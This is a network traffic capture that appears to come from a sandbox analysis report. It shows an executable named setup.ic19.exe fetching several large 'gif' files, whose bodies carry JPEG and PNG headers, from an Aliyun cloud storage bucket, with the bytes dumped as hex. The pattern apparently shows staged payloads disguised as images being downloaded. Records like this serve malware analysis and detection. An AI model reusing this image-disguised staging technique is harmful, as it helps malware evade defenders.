2024-10-02 02:27:22 UTC	4096	IN	Data Raw: 59 cf 0d de 8e cb 01 d2 9a c7 05 d6 96 c7 13 55 b2 c8 57 dd c5 c2 ce ce db cf dd c8 df c9 e8 22 4e 83 ec 2e 57 ef 23 e0 ba 98 77 e5 25 e9 a8 fc 39 5a fd 3e 5e ff 93 78 f2 30 46 f5 7f 47 c3 88 f9 03 cb 46 e3 c6 c8 c9 82 40 9a c5 86 f4 03 a5 dd 9b 5f 14 9e fc 1a 91 1b 23 df 91 e5 1f 92 e2 ab 68 24 ad dd 34 9d ec a2 60 27 06 e9 a7 db 3b ba 32 0d f6 ba 7a cc f8 b6 c0 0f b4 75 31 48 0e 4e c8 4c c4 e7 04 e0 e1 2b 0b 0c 41 85 49 18 5d 99 f3 5c 9e c6 fc 04 51 21 c8 68 12 57 94 28 69 19 e8 6c ac 2c 53 2c d9 d5 6a 3c 65 ad ed 38 78 b1 f3 3c 79 0d f0 4d e6 72 00 d7 75 b5 fd 0c ca 87 35 65 0d 7d 84 3c 59 03 c0 01 4d 06 74 9b 19 db 5b 20 51 a6 a8 19 49 13 a4 94 15 dd 9f 68 2d 59 a0 13 ba 2a ec 26 79 26 e0 a9 24 af 8f 73 38 49 8a 3d f8 7a 67 0c 54 32 f0 bd 34 55 bf c8 Data Ascii: YUW"N.W#w%9Z>^x0FGF@_#h$4`';2zu1HNL+AI]\Q!hW(il,S,j<e8x<yMru5e}<YMt[ QIh-Y*&y&$s8I=zgT24U
2024-10-02 02:27:22 UTC	4096	IN	Data Raw: 97 b5 5f 85 86 3d 81 8d 8a 4b c4 06 46 70 85 b1 49 93 94 dd 1d 2b bc 11 9a 9b 9c d5 15 2b 84 21 a2 a3 a4 ed 2d fb 8c d1 e2 28 68 c5 6d 50 95 f1 6c b3 b4 4a 93 85 66 b9 ba 44 99 99 60 bf c0 3e e7 f5 1e c5 c6 38 ed d9 11 cb cc 01 02 03 1c 1d 1e 1f 18 3c 3d c8 d8 d9 16 17 10 11 12 13 2c 2d 2e 2f 28 ad b5 af 6b 05 ca a3 61 e8 b5 08 f0 f1 ba 78 2d bd 7f f6 b0 72 b3 db b4 78 37 8b 19 0e b4 42 fb 4d f9 ce 8c c9 7e 02 30 f2 7a 0a 90 10 ed f8 11 fd ad e8 e7 e6 29 db 54 96 d5 57 a9 62 02 6b ad 66 0e 6f a1 6a 1a 63 af e9 0e 74 d9 71 14 33 34 7d bd 66 18 71 b7 3e 79 e2 3e 3f 08 c4 90 0b 4b 00 84 84 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 70 11 d3 07 78 1d 16 d2 65 89 84 63 64 2d ed be 20 e0 6b 23 e7 24 4e 27 f9 0d 56 3b 3c f0 bf fc 82 0d 63 74 ca 3c 81 37 7f Data Ascii: _=KFpI++!-(hmPlJfD`>8<=,-./(kax-rx7BM~0z)TWbkfojctq34}fq>y>?Kpxecd- k#$N'V;<ct<7
2024-10-02 02:27:22 UTC	4096	IN	Data Raw: cb 08 47 46 e0 e1 ee 19 ec ed ea 1d e8 e9 f6 01 f4 f5 04 f3 f0 f1 08 ff fc 0b d5 1c 67 9f a8 a1 a2 d0 e6 ed 2d e3 a2 51 e6 20 f8 a7 5e e7 33 58 92 fb 3d f4 ae fb 31 e8 aa f3 37 f9 b4 b7 8c 4a d6 c9 8d 3a 0f 8f 41 88 c2 87 45 dc bb 1a 99 52 32 cc 3d a6 29 28 27 bf bc bd 4c bb b8 b9 70 87 84 85 74 83 76 af 69 13 ea 1b 13 12 99 5a 48 d1 f2 f3 f4 bd 77 1e 78 f9 fa fb f3 e5 fa f5 0f 19 46 09 44 fa ce 72 e4 41 8b ca 0c 1d 0e 0f a8 51 12 13 14 59 9d 5b 12 e1 56 90 48 17 ee 53 2f e2 6b db 68 2a e5 76 d8 65 a1 67 26 c5 62 a4 64 3b d2 7f 3b f6 7f df 74 36 f9 6a dc 71 b5 73 4a 99 0e c8 10 4f 96 0f cb a0 0a 07 43 8e 07 57 1c 5e 91 02 44 19 dd 1b 52 51 16 d0 48 57 a1 97 2c 6e a1 2a 6c 29 69 a4 79 1c c0 22 ed 85 6e 7f 70 71 3b f2 8c 75 66 77 78 76 f9 0a 83 82 81 8f 00 Data Ascii: GFg-Q ^3X=17J:AER2=)('LptviZHwxFDrAQY[VHS/khveg&bd;;t6jqsJOCW^DRQHW,nl)iy"npq;ufwxv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	39.103.20.76	443	6876	C:\Users\user\Desktop\setup.ic19.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:27:24 UTC	111	OUT	GET /b.gif HTTP/1.1 User-Agent: GetData Host: 101oss.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:27:24 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:27:24 GMT Content-Type: image/gif Content-Length: 3665365 Connection: close x-oss-request-id: 66FCAF8CA645AE3538B578FE Accept-Ranges: bytes ETag: "F5D6B16AF203326430D1D2AF426406D3" Last-Modified: Mon, 30 Sep 2024 05:54:01 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 15557376374577476843 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 9daxavIDMmQw0dKvQmQG0w== x-oss-server-time: 3
2024-10-02 02:27:24 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-10-02 02:27:24 UTC	4096	IN	Data Raw: 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
2024-10-02 02:27:24 UTC	4096	IN	Data Raw: e0 22 b7 dd ae 9b 4f ab dd 8a 95 a8 ce 4e f0 65 15 f5 9c a8 5a 81 9a 82 c2 52 31 dd a3 29 03 fc fa 3c 84 e4 ac 16 67 5c 41 3e bc e5 3f e7 78 1c f2 86 e1 a6 81 d0 19 1e 45 80 af bd ef b4 f9 1f 33 68 ea b0 7e 0a 33 e8 62 c9 12 cb 53 91 1c d2 dc 29 ec 8b 85 df fb 1b 9c 84 06 7c 63 f6 26 a2 8e b1 a8 da a0 30 f7 16 30 ca 1c ac 49 50 3a e1 69 70 65 32 b5 9b b6 6d 7b e1 22 75 c3 3a ec 97 07 51 86 12 17 f9 e2 39 6b 20 15 4d ef 26 01 5c 19 a9 a3 7f 58 ca e5 4d b9 fb 32 f1 f9 26 f3 e3 92 49 b0 bf 73 8d 6c 5c ae f3 87 98 76 de 9c 27 da 14 09 bf f4 c7 73 a8 c1 3c 44 73 b1 1e 08 45 00 77 ec 77 84 8a 43 6a 64 b8 9b 33 37 16 ee a2 a4 6f 6f 18 72 46 18 c3 aa d8 cd 9a 1d 01 ac c3 07 de af 7d 32 b6 6c 60 7b ad af 3c de 92 55 22 de 19 1b 53 74 fe a1 44 6f 04 44 8a 66 ad 47 Data Ascii: "ONeZR1)<g\A>?xE3h~3bS)\|c&00IP:ipe2m{"u:Q9k M&\XM2&Isl\v's<DsEwwCjd37oorF}2l`{<U"StDoDfG
2024-10-02 02:27:25 UTC	4096	IN	Data Raw: d5 bd 30 74 ce 6f d1 b1 87 76 4f f7 39 d6 c3 8f 06 82 f2 0f a2 d9 24 bc cc 46 4a b5 b3 75 9d c1 29 26 17 f6 a9 c3 bd e9 0a c3 ca 61 2c 08 a9 33 35 f3 4b d3 3f 06 3d 87 9a 2e c2 7d 24 c5 32 d9 28 ce 00 55 28 01 bb 96 90 89 c8 26 a0 66 86 c4 12 78 da 93 7c 76 5d 0b b0 50 72 98 ad f6 d9 ec 5c 43 b9 53 ee b5 22 17 c7 d8 aa 40 bd e6 39 0c 04 1b f9 13 fe a5 7a 4f df c0 c2 28 55 5a e5 69 fc 34 5c af ea 76 ab 78 a0 42 5d 39 dc 44 1c f7 c2 8e 4b a8 44 ea dd d9 04 f4 b0 27 4e d6 6b 48 88 42 49 81 ca ee 8a 3d 49 57 15 4a 4b cf f6 c8 62 f0 d9 c7 a0 65 da 6a 00 41 2f 35 4f 77 aa 97 fc a2 ba 06 a6 bd 44 f3 e4 0f 3b 3a 6a 8c 83 e6 c6 36 84 87 b0 44 01 ce 22 40 27 e7 08 fb 84 40 1b 78 b0 f1 2e d0 15 c0 46 26 df 91 a4 e9 c6 d8 a0 dc ad 54 50 6a d1 0c 9b 12 91 62 fb 70 42 Data Ascii: 0tovO9$FJu)&a,35K?=.}$2(U(&fx\|v]Pr\CS"@9zO(UZi4\vxB]9DKD'NkHBI=IWJKbejA/5OwD;:j6D"@'@x.F&TPjbpB
2024-10-02 02:27:25 UTC	4096	IN	Data Raw: 4d 2f 4c f4 b7 87 b1 5f 54 37 fb 1a 0f bc 8d b6 9b 09 02 c3 1a ad 5b ab 19 62 d9 22 17 62 e3 7c bb ba b3 b1 48 e4 9f f7 19 45 fc 47 07 b0 3b 06 64 ca f0 0a 3f 4a 43 1f 38 76 35 33 69 74 b0 e8 9d 90 87 5c e9 2d 08 4a 33 8e 73 44 33 05 a4 60 22 a6 7b 7a 3a 8d b3 82 0c a2 98 62 57 22 cb b4 a1 52 92 f4 f0 4f 80 5b ee 33 db d2 4f aa 4f 78 0f 1b a0 88 23 66 eb 50 10 a7 bd 98 94 de 44 be 8b fe a5 1a d8 9c 16 94 bb ee aa 1d db 9f 2f b0 57 ac 9d e8 63 04 85 e5 79 40 da 81 16 9b b2 9f c8 8a 3b 98 dc 65 80 4b 2d 32 e8 f0 b3 93 e7 1e 37 97 00 41 8b 8c 5f 6e f3 23 48 f1 eb dd d2 df 2e a6 a4 2c 2e c8 78 d0 c6 56 18 be af 6f 6c b7 02 4a 7b 61 da aa 00 d7 8a c2 c2 57 0f d9 7b ff 18 c9 48 c4 84 33 49 cd b0 12 90 35 e0 bf 71 fe 82 a8 b3 3e 09 db 4f 94 21 bc 0e 5b 82 35 f7 Data Ascii: M/L_T7[b"b\|HEG;d?JC8v53it\-J3sD3`"{z:bW"RO[3OOx#fPD/Wcy@;eK-27A_n#H.,.xVolJ{aW{H3I5q>O![5
2024-10-02 02:27:25 UTC	4096	IN	Data Raw: 0c 9d be d7 c3 5d 62 1f 97 a2 42 c9 fe b2 81 42 0c 3b ae 90 7b 88 c2 d5 0c 45 92 cc d3 e8 fc a7 b4 fa 6c 04 d3 4d 06 ae a7 2d 2f 70 1b ff 7e 57 76 03 2d 42 2d 4d e1 78 03 89 b2 9f b8 80 a3 a2 6d 23 4b 3b 4f 21 82 d3 1d 7a 9b b7 74 84 f3 f6 21 89 f6 9b 4c c4 83 76 b1 e1 9e 73 b4 84 f3 c6 21 01 7e 83 54 5c 2b f6 21 99 e6 2b 8c 0c 6b d6 11 a1 8c e1 b5 0f 09 00 c0 16 ac e9 e1 6f 3d 48 98 7e e0 99 6d b7 c5 c0 c0 56 54 59 f5 07 41 78 10 be 75 d8 fd 2f 7d 0e 26 0b 50 e7 e5 84 30 12 dd dc db 5e 52 45 b5 e1 14 05 3e df d4 1b 38 11 a9 b4 27 25 60 05 c7 c6 c5 b9 35 f2 8d fe d5 69 96 9a 09 82 81 e3 5b 57 40 df 2e 8d b0 0a 11 15 e5 22 ec 38 cb 3f 1c 3b af 3e 80 b6 22 d0 14 f1 c5 93 14 f5 58 25 2a 52 0d ae 01 4e e4 83 a6 23 e1 b3 9e 54 80 da 34 6f 63 9e 78 e2 e7 d8 9c Data Ascii: ]bBB;{ElM-/p~Wv-B-Mxm#K;O!zt!Lvs!~T\+!+ko=H~mVTYAxu/}&P0^RE>8'%`5i[W@."8?;>"X%*RN#T4ocx
2024-10-02 02:27:25 UTC	4096	IN	Data Raw: 6a 25 7e 19 a2 68 41 6c 4b 63 2a 77 a7 22 61 45 16 f5 6b 5e 9e 90 63 91 f1 7c 78 f5 bd 30 74 f9 0e 8c d8 55 c2 40 0c 81 0e 9c f0 7d b2 20 d3 41 ee 7c 9f 1d 45 9a c7 ba 08 7a bd 11 44 f1 f3 28 91 a9 8a f5 d3 4f 60 26 6e 70 05 fb d7 6b 3e 38 93 d0 89 da d7 8c a5 c2 2b 62 69 0a f7 8e cd a2 63 26 71 26 3f 70 1d 50 2b 4a 89 c2 b7 de 6d 2a 63 0e d1 b4 47 22 70 06 55 30 6d bd b4 c7 52 07 f5 96 77 81 44 0e 4f 43 05 46 23 30 29 e1 1c 7f 1c 6d 0d be 6d 34 10 03 18 63 f8 ac 74 7d 73 5f 4d 68 4e 75 1a 82 4b c0 4f 2c 49 c7 fc 4c 11 72 11 4c af 93 52 31 bf bd 04 56 31 b2 a8 1a f8 a4 f5 c7 f8 6b 8b 49 7e 3d c7 a5 c7 ba da a8 af 8c 84 c7 39 4a 98 2b 38 c4 e5 37 ab f7 c2 8e 6f b8 20 02 09 61 fc cc e8 c7 c2 9e 67 d0 04 82 a9 a9 14 44 48 07 7a ce 23 a0 18 5a 7d 51 d0 d4 28 Data Ascii: j%~hAlKcw"aEk^c\|x0tU@} A\|EzD(O`&npk>8+bic&q&?pP+JmcG"pU0mRwDOCF#0)mm4ct}s_MhNuKO,ILrLR1V1kI~=9J+87o agDHz#Z}Q(
2024-10-02 02:27:25 UTC	4096	IN	Data Raw: 41 22 db b6 6d 32 0f 7a d9 82 a3 c4 2d 48 a7 c6 01 42 1b 70 a5 fc 2f 64 11 5e 3b 68 65 16 87 f0 49 00 0b 5e f0 64 55 40 82 82 d6 2d 99 33 9d ab a3 78 fb ba 46 31 37 05 1d 0e 13 81 11 0b 14 7b 5b 69 1e 2d f2 af 73 71 62 c1 0d 6e a4 c7 11 a3 3d 01 c4 47 15 c7 8a 18 9b 19 86 44 52 3e fb 19 5a a8 dd 5f c4 b7 69 0b fb 81 ca b3 f4 a5 f2 ff a8 a9 cc 33 6c 45 3e 9f f0 29 4e 8b ec 1d a0 ff a2 91 ce 13 56 1d 40 4f 3e 91 f0 1b 42 65 0c 40 3f 89 f5 0d 1c 86 e1 fe 38 e8 f1 0b 2b 34 12 de 5e ef c5 3f b3 8a be ec 14 75 38 e6 a6 bd b1 f0 70 e9 ed 99 e6 84 29 49 59 fa 1e 17 b6 9e 72 de d0 3b 6f 46 f6 a5 79 58 f8 51 44 a9 e6 ac 21 69 98 6a 2f 74 50 1b 77 78 a3 89 4e 6a 47 22 d0 f0 44 ce c1 2a 00 8b d7 b8 9b de 36 52 4f 8b 40 8e 24 01 81 45 80 6b 4f ef bb d1 9c f1 c5 a6 e3 Data Ascii: A"m2z-HBp/d^;heI^dU@-3xF17{[i-sqbn=GDR>Z_i3lE>)NV@O>Be@?8+4^?u8p)IYr;oFyXQD!ij/tPwxNjG"D*6RO@$EkO
2024-10-02 02:27:25 UTC	4096	IN	Data Raw: d5 67 fe e2 73 96 57 af 11 53 fb 99 a7 3f 14 28 8c d6 6e cc d8 63 ce ba 79 3d ec 77 2c ca a0 7f 84 38 7c 42 22 1f 5e 77 a4 65 48 2c 25 14 5c d9 37 a0 82 b7 36 68 9e 22 62 a5 c1 06 12 05 d1 60 9e a9 f8 52 c5 5a 45 5e 14 ed 57 15 c0 a2 21 f9 2e f3 53 47 eb 83 4a f7 e7 76 9d 7c 4b 00 c6 7a 3a 43 27 75 64 4d 92 ff 36 52 32 67 d0 cd 25 10 9f f0 02 e0 28 d1 63 21 9a f8 c2 6e 32 40 ab 88 a7 4d 19 d6 60 b3 36 1b ab 9e d3 2b 95 d7 23 41 7e 14 cd 2d 2d 4c e6 6f 3d ed 09 c3 38 84 f8 5a 3a fd 2b 58 f0 5a 2e 5d 24 f8 79 4a 1c 35 ef 17 a9 eb 6c 0e 91 49 92 8c 9b 0c ff 53 27 82 13 09 1e 89 ca 64 c3 13 ca f9 e2 0e ad 49 c8 58 35 cb 8c 75 cf 8d dd bf e3 d5 ed 45 2c 6b 11 e4 1b b7 7e ff de 57 7c b8 4e f2 b2 fa 9e d0 22 99 d4 11 7e 48 3b 44 a6 12 e2 a7 5c e0 a4 41 21 1d 89 Data Ascii: gsWS?(ncy=w,8\|B"^weH,%\76h"b`RZE^W!.SGJv\|Kz:C'udM6R2g%(c!n2@M`6+#A~--Lo=8Z:+XZ.]$yJ5lIS'dIX5uE,k~W\|N"~H;D\A!
2024-10-02 02:27:25 UTC	4096	IN	Data Raw: 13 ec 2c e8 c9 bd 61 02 f9 26 a1 7a 19 19 3a 91 e8 c1 63 29 94 e3 13 d4 ef a5 a6 e7 71 a3 cc 48 f1 62 8e a4 dc 73 2b 53 70 ea b4 f9 d2 8a 3e f8 a6 87 5a 87 e7 0b b8 c3 6e 39 2d a7 15 1e 37 cf 6b 62 4b d2 b7 33 65 ce 76 ca b6 19 4a 62 90 6f 0a cd 52 ad 5b 6f a5 69 1a 68 d2 e7 ba dc 39 5e 8c 70 e4 1f 30 36 37 88 f2 01 c0 fc 5f 96 2e 82 c3 b0 9c 46 04 21 9f 1b d4 55 a2 fc 84 96 84 ff dc f9 ae f9 12 a9 ad 2d fd a3 3e 54 f6 79 a2 8e 37 3d 9b fb 9c f9 14 a2 23 01 bf e5 d8 27 df 1b d4 a2 88 0b 2b ef 2d 48 05 bd b3 a4 b2 3b fe a0 6a 7a 34 4f 5f b1 80 0a 92 57 96 37 0d c7 4f 75 bf f9 c7 21 a7 a7 47 80 4b 31 25 f5 8f 63 82 d2 50 ae ea fe fd 3c 1c c7 f4 75 e5 5d 24 36 db 2c 91 e9 1c 4b a0 1b 1f 9f 9d fd 60 72 1b ce 48 43 c1 16 8b e1 43 f1 01 2d 94 9e 18 f7 90 0b 95 Data Ascii: ,a&z:c)qHbs+Sp>Zn9-7kbK3evJboR[oih9^p067_.F!U->Ty7=#'+-H;jz4O_W7Ou!GK1%cP<u]$6,K`rHCC-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	39.103.20.76	443	6876	C:\Users\user\Desktop\setup.ic19.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:27:31 UTC	111	OUT	GET /c.gif HTTP/1.1 User-Agent: GetData Host: 101oss.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:27:32 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:27:32 GMT Content-Type: image/gif Content-Length: 9161 Connection: close x-oss-request-id: 66FCAF94478EF43739D27912 Accept-Ranges: bytes ETag: "A053E9275BACA09ADC2ECFDCBC7A76C5" Last-Modified: Mon, 30 Sep 2024 05:41:23 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3550377586564766984 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: oFPpJ1usoJrcLs/cvHp2xQ== x-oss-server-time: 2
2024-10-02 02:27:32 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-10-02 02:27:32 UTC	4096	IN	Data Raw: a2 e7 c1 09 4c a2 fa 34 a3 1d f7 6d 53 d8 7d 48 04 30 88 34 4a 1e 5c 40 fc 26 ec 12 f8 4f f9 31 33 79 72 84 fe 94 cb 8f e7 d2 e0 c4 f1 b6 fe 1b d1 38 2f c0 ed 6e 8e 80 bb a4 50 bf a4 4d 2e d6 da 14 60 89 2d dc 79 82 9d fd c8 88 19 46 d9 7b 21 c4 18 7f e4 6a 53 0d af fb 46 e4 a5 82 20 5c 56 d2 6b 4a 2c 7e dc 06 f1 f6 76 44 b1 b2 ec 9c 7c 23 eb 94 a4 49 f4 76 e5 69 59 4d 1e bd fc 97 d4 d7 ee 5e 25 98 f8 c6 1e 3d e7 54 80 88 7d 00 3c ee 8d 6e 3e 5e 2f 58 b4 a9 1f 04 b4 a4 0a 96 ac 1e 62 5a 80 f9 22 96 5e 06 b5 75 ad 76 35 be bd ec 79 b4 b9 aa f2 45 1d 29 12 35 25 30 e9 70 86 60 fa 1d 7c b0 c2 0b ea 0c 1a e4 59 e5 a0 39 71 cd 00 48 ca cb 19 32 4c 73 02 78 f2 8b 5a 5f 17 94 34 36 72 ed 00 fb 12 27 38 eb cb 3e 7d dc 4c 5e d6 0c a1 a3 15 cb 7f 5e b8 14 bf 67 fc Data Ascii: L4mS}H04J\@&O13yr8/nPM.`-yF{!jSF \VkJ,~vD\|#IviYM^%=T}<n>^/XbZ"^uv5yE)5%0p`\|Y9qH2LsxZ_46r'8>}L^^g
2024-10-02 02:27:32 UTC	1512	IN	Data Raw: 52 e0 1e 11 03 ab 0f 6d 7a 80 06 d5 90 c8 be fb f7 ce e8 87 ed 20 9d 24 15 ab 23 14 46 0f 61 12 af 27 68 af da 73 1c 03 97 bc 5a 85 41 85 87 54 43 c8 d1 db e3 f9 af 9e a2 b1 1f a0 1c 7e f3 c2 28 47 d1 bb 59 e5 04 23 c8 54 20 af 8b f9 d1 91 de 1e 92 00 7a 7c 2f e5 72 1a 85 76 dc 15 7e 96 14 0a 1f 7b 00 65 69 47 d5 4b b9 c9 a3 05 9b bd 12 24 f8 6d d3 65 80 1c ed ae 1a 8b 34 c4 3a 70 aa 41 1a f5 75 ef 16 d8 d8 9f 72 25 68 49 de 1e 02 ba 55 9d b9 03 05 97 f7 1d c3 dc b5 9a f2 77 8a 9c 1b 52 b1 e9 43 b5 64 4b 5f 31 e1 e6 ab 3b 37 c7 b9 f6 c5 20 66 d8 80 7a b3 e3 b2 94 64 08 08 67 8d 05 f4 93 22 b3 d3 11 d5 8a 12 8a 24 a1 8c 6b 59 1e dc 10 67 6d ca a6 1a d0 d3 98 71 5b aa c7 c6 62 c7 a2 2c c4 37 98 65 42 1e 63 4c 11 a4 b3 fe de ef 94 78 60 dc 27 11 ac f7 79 a4 Data Ascii: Rmz $#Fa'hsZATC~(GY#T z\|/rv~{eiGK$me4:pAur%hIUwRCdK_1;7 fzdg"$kYgmq[b,7eBcLx`'y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	39.103.20.76	443	6876	C:\Users\user\Desktop\setup.ic19.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:27:33 UTC	111	OUT	GET /d.gif HTTP/1.1 User-Agent: GetData Host: 101oss.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:27:34 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:27:33 GMT Content-Type: image/gif Content-Length: 3948026 Connection: close x-oss-request-id: 66FCAF95E48B2B39349144A3 Accept-Ranges: bytes ETag: "C5E65833E6AB5D296AE3CC936BF95FCD" Last-Modified: Tue, 01 Oct 2024 06:00:21 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 16122144274936516260 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: xeZYM+arXSlq48yTa/lfzQ== x-oss-server-time: 3
2024-10-02 02:27:34 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2024-10-02 02:27:34 UTC	4096	IN	Data Raw: d4 a4 fa 37 a0 08 90 3d 6f 41 a0 21 c2 9f f0 0d 81 94 5a c2 6a c9 7e ed 59 7c 44 6c 78 04 e1 40 78 da b4 b0 df 01 d6 c8 9b 86 d9 c9 dd 99 9a 79 be af 6d d4 f9 6a 2e a2 ad c0 cc a7 e5 23 aa 56 21 22 bf b3 e1 b4 7a 17 6f 98 e2 a3 9c 62 59 a6 e2 b3 ff 7e 61 70 53 79 3c d0 f3 1a f5 32 8c 78 9e 17 17 c6 9c 33 0f f1 fa 41 a6 92 10 6e 4f be e9 7f 18 31 bd e6 1a 50 c1 cc 65 ea dd 8f 26 b4 59 16 14 48 b1 4e b5 6d 3b 65 d3 f1 38 54 44 9e 9f 29 55 38 69 32 2c f9 37 b1 ef 7a 97 3f 8f 5b 46 70 11 df 88 4b c4 b0 a0 ca 1f 3f 3e ac f6 a7 87 b1 ad 3b a1 94 56 fa 51 62 1d 3a f9 0a dd bb 60 52 d4 4c db bd 85 77 9e b4 44 80 6a d6 8a b5 3c 9a dc 33 65 1e f9 69 ca 08 6a db 41 54 8a 9c 8c 3a d7 ee 53 26 45 8a 8b 42 89 2a a9 74 80 97 de cb b3 76 44 99 2a 87 6c 68 48 1c 29 86 2e Data Ascii: 7=oA!Zj~Y\|Dlx@xymj.#V!"zobY~apSy<2x3AnO1Pe&YHNm;e8TD)U8i2,7z?[FpK?>;VQb:`RLwDj<3eijAT:S&EBtvDlhH).
